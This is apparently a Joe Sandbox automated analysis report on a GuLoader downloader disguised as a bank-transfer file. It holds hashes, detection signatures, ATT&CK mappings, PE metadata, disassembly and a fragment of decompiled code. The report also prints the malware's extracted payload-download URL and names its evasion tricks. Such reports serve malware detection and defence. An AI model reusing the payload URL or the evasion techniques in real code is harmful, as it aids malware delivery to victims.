Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Transferencia_29_11_2021 17.03.39.exe

Overview

General Information

Sample Name:Transferencia_29_11_2021 17.03.39.exe
Analysis ID:532136
MD5:a70cf8fdf5c68e414bad4494a44f272a
SHA1:4a974930db625492a8aa3f046759db6f3f057129
SHA256:dd7883497ba8fc4a8fac606d4f3cec70b6d42c0017e320f9becb071d899c6c30
Tags:exesigned
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
PE / OLE file has an invalid certificate
Contains functionality to call native functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses code obfuscation techniques (call, push, ret)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Detected potential crypto function

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje"}
    Source: Transferencia_29_11_2021 17.03.39.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1V_BC3orZyo_Cje
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://ocsp.digicert.com0O
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: Transferencia_29_11_2021 17.03.39.exeString found in binary or memory: https://www.digicert.com/CPS0

    System Summary:

    barindex
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: Transferencia_29_11_2021 17.03.39.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: Transferencia_29_11_2021 17.03.39.exeStatic PE information: invalid certificate
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FD800 NtAllocateVirtualMemory,0_2_020FD800
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FD025 NtAllocateVirtualMemory,0_2_020FD025
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.883074798.0000000002AA0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameoutrunner.exeFE2XU vs Transferencia_29_11_2021 17.03.39.exe
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000000.357361914.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameoutrunner.exe vs Transferencia_29_11_2021 17.03.39.exe
    Source: Transferencia_29_11_2021 17.03.39.exeBinary or memory string: OriginalFilenameoutrunner.exe vs Transferencia_29_11_2021 17.03.39.exe
    Source: Transferencia_29_11_2021 17.03.39.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_021067510_2_02106751
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FD8000_2_020FD800
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FD2A90_2_020FD2A9
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020F177F0_2_020F177F
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_02104B640_2_02104B64
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020F97F80_2_020F97F8
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FD0250_2_020FD025
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_021048F50_2_021048F5
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_021035B40_2_021035B4
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FE1A30_2_020FE1A3
    Source: Transferencia_29_11_2021 17.03.39.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: classification engineClassification label: mal68.rans.troj.winEXE@1/0@0/0
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeFile created: C:\Users\user\AppData\Roaming\XvFu5flZcgudIlwvVLtjOx372Jump to behavior

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_00404857 push cs; ret 0_2_00404858
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_00405D21 push E5BAE958h; ret 0_2_00405D26
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FD800 push ds; iretd 0_2_020FE17E
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020F0A0B push es; retf 29E3h0_2_020FFBC8
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020F4170 push ds; iretd 0_2_020F4171
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FCF30 rdtsc 0_2_020FCF30
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_02104B64 mov eax, dword ptr fs:[00000030h]0_2_02104B64
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_021027CD mov eax, dword ptr fs:[00000030h]0_2_021027CD
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FC46B mov eax, dword ptr fs:[00000030h]0_2_020FC46B
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_02103111 mov eax, dword ptr fs:[00000030h]0_2_02103111
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_020FCF30 rdtsc 0_2_020FCF30
    Source: C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exeCode function: 0_2_02106751 RtlAddVectoredExceptionHandler,0_2_02106751
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmpBinary or memory string: &Program Manager
    Source: Transferencia_29_11_2021 17.03.39.exe, 00000000.00000002.882623015.0000000000C80000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSystem Information Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Transferencia_29_11_2021 17.03.39.exe9%ReversingLabsWin32.Downloader.GuLoader

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    0.0.Transferencia_29_11_2021 17.03.39.exe.400000.0.unpack100%AviraHEUR/AGEN.1140082Download File
    0.2.Transferencia_29_11_2021 17.03.39.exe.400000.0.unpack100%AviraHEUR/AGEN.1140082Download File

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:532136
    Start date:01.12.2021
    Start time:18:59:22
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 7m 48s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Transferencia_29_11_2021 17.03.39.exe
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:20
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.rans.troj.winEXE@1/0@0/0
    EGA Information:Failed
    HDC Information:
    • Successful, ratio: 53.3% (good quality ratio 17.2%)
    • Quality average: 19.8%
    • Quality standard deviation: 31.1%
    HCA Information:Failed
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
    • Excluded IPs from analysis (whitelisted): 23.211.6.115
    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
    • Not all processes where analyzed, report is missing behavior information

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    No created / dropped files found

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):5.216110090959714
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.15%
    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:Transferencia_29_11_2021 17.03.39.exe
    File size:152688
    MD5:a70cf8fdf5c68e414bad4494a44f272a
    SHA1:4a974930db625492a8aa3f046759db6f3f057129
    SHA256:dd7883497ba8fc4a8fac606d4f3cec70b6d42c0017e320f9becb071d899c6c30
    SHA512:7279f30ac01665f31e4dd4ff11fb85954d9109953e1d3b041971cba8973e6b640eca8794223a5be3762d1911889ba12fc8b84c952b49f002f98f1e79ba6eb273
    SSDEEP:1536:4JE6l7m717UopmGeFgk1hG6dvlWOCQe1FpVfBRnOmk:KE6l7mh/UFgk1hG6GOC/lf2mk
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....7.K.....................0............... ....@................

    File Icon

    Icon Hash:20047c7c70f0e004

    Static PE Info

    General

    Entrypoint:0x401888
    Entrypoint Section:.text
    Digitally signed:true
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    DLL Characteristics:
    Time Stamp:0x4B9437E6 [Sun Mar 7 23:33:58 2010 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:4
    OS Version Minor:0
    File Version Major:4
    File Version Minor:0
    Subsystem Version Major:4
    Subsystem Version Minor:0
    Import Hash:b209c8634733456633136bfedc71877a

    Authenticode Signature

    Signature Valid:false
    Signature Issuer:E=ansvarslsere@Episcotister1.BON, CN=INDDRIVNING, OU=sporuloid, O=atomkraftvrks, L=Capsheaf, S=Appointed, C=CD
    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
    Error Number:-2146762487
    Not Before, Not After
    • 12/1/2021 3:06:33 AM 12/1/2022 3:06:33 AM
    Subject Chain
    • E=ansvarslsere@Episcotister1.BON, CN=INDDRIVNING, OU=sporuloid, O=atomkraftvrks, L=Capsheaf, S=Appointed, C=CD
    Version:3
    Thumbprint MD5:29DB6066933764E6DBF96BB776031AF3
    Thumbprint SHA-1:7F5DF2711E99DDB2A16381EF8330D115FB1C72B2
    Thumbprint SHA-256:B038217303FB0C77E03FB5D245BB31AF36E8932DBBB944A0599B9F5ECB20D07C
    Serial:00

    Entrypoint Preview

    Instruction
    push 004019CCh
    call 00007FC448DAE9B5h
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    xor byte ptr [eax], al
    add byte ptr [eax], al
    inc eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [88474D5Dh], dh
    dec edx
    mov byte ptr [6CC034C0h], al
    jnle 00007FC448DAE9BFh
    push cs
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add dword ptr [eax], eax
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    push ebp
    dec esi
    inc edx
    dec edi
    dec esp
    inc esp
    inc ebp
    dec esi
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    dec esp
    xor dword ptr [eax], eax
    add byte ptr [edx-7BDFC270h], bh
    jmp 00007FC448DAE9F1h
    dec ebp
    cmp byte ptr [ebx-29h], FFFFFFE3h
    je 00007FC448DAEA19h
    pop ebp
    adc esp, dword ptr [ebx-3Dh]
    xchg eax, esi
    mov bh, dl
    mov al, byte ptr [E3B79F4Fh]
    or cl, byte ptr [edx+ebp*4+4F3A977Ah]
    lodsd
    xor ebx, dword ptr [ecx-48EE309Ah]
    or al, 00h
    stosb
    add byte ptr [eax-2Dh], ah
    xchg eax, ebx
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    pop eax
    add byte ptr [eax], al
    add byte ptr [ebx+00h], dl
    add byte ptr [eax], al
    add byte ptr [edi], al
    add byte ptr [edx+79h], ah
    jc 00007FC448DAEA3Dh
    outsb
    add byte ptr [41001001h], cl
    jnc 0000EA2Eh
    jnc 00007FC448DAEA2Ch

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x213d40x28.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x240000x960.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x240000x1470
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
    IMAGE_DIRECTORY_ENTRY_IAT0x10000x234.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x20ac40x21000False0.366751006155data5.29953521895IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .data0x220000x122c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc0x240000x9600x1000False0.175048828125data2.0387904916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_ICON0x248300x130data
    RT_ICON0x245480x2e8data
    RT_ICON0x244200x128GLS_BINARY_LSB_FIRST
    RT_GROUP_ICON0x243f00x30data
    RT_VERSION0x241500x2a0dataChineseTaiwan

    Imports

    DLLImport
    MSVBVM60.DLL__vbaR8FixI4, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, __vbaLenVar, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFPFix, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaGet3, __vbaAryConstruct2, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaVarTstGe, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

    Version Infos

    DescriptionData
    Translation0x0404 0x04b0
    LegalCopyrightUnion
    InternalNameoutrunner
    FileVersion4.00
    CompanyNameUnion
    LegalTrademarksUnion
    ProductNameUnion
    ProductVersion4.00
    FileDescriptionUnion
    OriginalFilenameoutrunner.exe

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    ChineseTaiwan

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    Analysis Process: Transferencia_29_11_2021 17.03.39.exe PID: 6856 Parent PID: 6076

    General

    Start time:19:00:26
    Start date:01/12/2021
    Path:C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\Transferencia_29_11_2021 17.03.39.exe"
    Imagebase:0x400000
    File size:152688 bytes
    MD5 hash:A70CF8FDF5C68E414BAD4494A44F272A
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:Visual Basic
    Yara matches:
    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Author: Joe Security
    Reputation:low

    Chronological Activities

    Disassembly

    Code Analysis

    Reset < >

      Analysis Process: Transferencia_29_11_2021 17.03.39.exe PID: 6856 Parent PID: 6076 Transferencia_29_11_2021 17.03.39.exeCOMMON

      Executed Functions

      Function 02106751, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 225COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID:
      • String ID: }v{i
      • API String ID: 0-281594494
      • Opcode ID: 4abb04358c9085ad25bc2903fd0b4b0b7361b47ab56ec62e64353b72e915be66
      • Instruction ID: e2827f86cf3b2730ee0f0d0c928f0d849576f1f1a17aa024a79c4ac80f532284
      • Opcode Fuzzy Hash: 4abb04358c9085ad25bc2903fd0b4b0b7361b47ab56ec62e64353b72e915be66
      • Instruction Fuzzy Hash: F691F471644244CFDB35DE29CDD87EA77A3AF99350F51812ADC098F398D7B09A42CB41
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020FD025, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID:
      • API String ID: 2167126740-0
      • Opcode ID: a2c4708fa71904a784c96a8db9633b3859b63441bd3cd0b2340a7f928f557050
      • Instruction ID: ec61012113a5afb0741ee643f4b36071138c6d1cae8c1d76fd4ea710a34ba2e0
      • Opcode Fuzzy Hash: a2c4708fa71904a784c96a8db9633b3859b63441bd3cd0b2340a7f928f557050
      • Instruction Fuzzy Hash: 5FF113300843855FC6E5AE69998D2EC3FA2EF11F79B44074BCB74069F5DB230286E65B
      Uniqueness

      Uniqueness Score: -1.00%

      Function 020FD800, Relevance: 2.0, APIs: 1, Instructions: 453memorynativeCOMMON
      Download Yara Rule
      APIs
      • NtAllocateVirtualMemory.NTDLL ref: 020FDB97
      Memory Dump Source
      • Source File: 00000000.00000002.882678032.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
      Yara matches
      Similarity
      • API ID: AllocateMemoryVirtual
      • String ID:
      • API String ID: 2167126740-0
      • Opcode ID: 46022d4da9e175a44629a49850d5ef4d1e78caaa43d9ce5536aa0402c1bd551d
      • Instruction ID: 179ad3a8b60d67ac78b426d6109514e5e92f097dec09f7aad32c2bcc84bc8b9b
      • Opcode Fuzzy Hash: 46022d4da9e175a44629a49850d5ef4d1e78caaa43d9ce5536aa0402c1bd551d
      • Instruction Fuzzy Hash: E9E108300943845FC6F5AE69998D6DC3FA2FB11B38F49074ACB70469F5CB6212C8E65B
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041C1E4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267COMMON
      Download Yara Rule
      C-Code - Quality: 71%
      			E0041C1E4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				signed int _v44;
				void* _v48;
				short _v52;
				short* _v64;
				char _v76;
				short _v84;
				void* _v88;
				short _v92;
				void* _v96;
				intOrPtr _v100;
				short _v104;
				void* _v108;
				void* _v112;
				char _v128;
				short _v132;
				intOrPtr _v136;
				void* _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				char _v168;
				long long _v176;
				char _v184;
				intOrPtr _v192;
				char _v200;
				intOrPtr _v208;
				char _v216;
				intOrPtr _v224;
				char _v232;
				long long _v240;
				char _v248;
				char _v264;
				char* _v272;
				char _v280;
				char _v332;
				signed int _v336;
				signed int _v340;
				void* _v344;
				signed int _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				long long _v368;
				long long _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				char* _t658;
				signed short _t659;
				signed int _t671;
				char* _t675;
				short _t676;
				short _t685;
				short _t695;
				signed int _t704;
				signed int _t707;
				signed int _t708;
				signed int _t712;
				char* _t713;
				signed int _t720;
				signed int _t722;
				signed int _t723;
				signed int _t731;
				signed int _t732;
				signed int _t737;
				signed int _t738;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				char* _t747;
				signed int _t761;
				signed int* _t762;
				signed int _t771;
				char* _t772;
				char* _t776;
				signed int _t780;
				signed int _t797;
				signed int _t802;
				char* _t808;
				char* _t819;
				signed int _t822;
				signed int _t827;
				signed int* _t832;
				signed int _t836;
				signed char _t842;
				signed int _t845;
				char* _t848;
				signed int _t849;
				char* _t853;
				char* _t854;
				signed int _t857;
				signed int _t865;
				char* _t874;
				signed int* _t879;
				short _t882;
				signed int _t883;
				signed int _t885;
				signed int _t887;
				signed int _t889;
				char* _t891;
				short _t892;
				signed int _t897;
				signed int _t899;
				signed int _t901;
				short _t903;
				signed int _t904;
				signed int _t906;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t912;
				signed int _t914;
				signed int _t915;
				signed int _t921;
				signed int _t926;
				char* _t932;
				signed int _t989;
				signed int _t999;
				signed int _t1004;
				signed int _t1010;
				signed int _t1015;
				void* _t1065;
				void* _t1067;
				intOrPtr _t1068;
				void* _t1069;
				void* _t1070;
				void* _t1082;
				long long _t1086;

				_t1068 = _t1067 - 0xc;
				 *[fs:0x0] = _t1068;
				L00401540();
				_v16 = _t1068;
				_v12 = 0x401260;
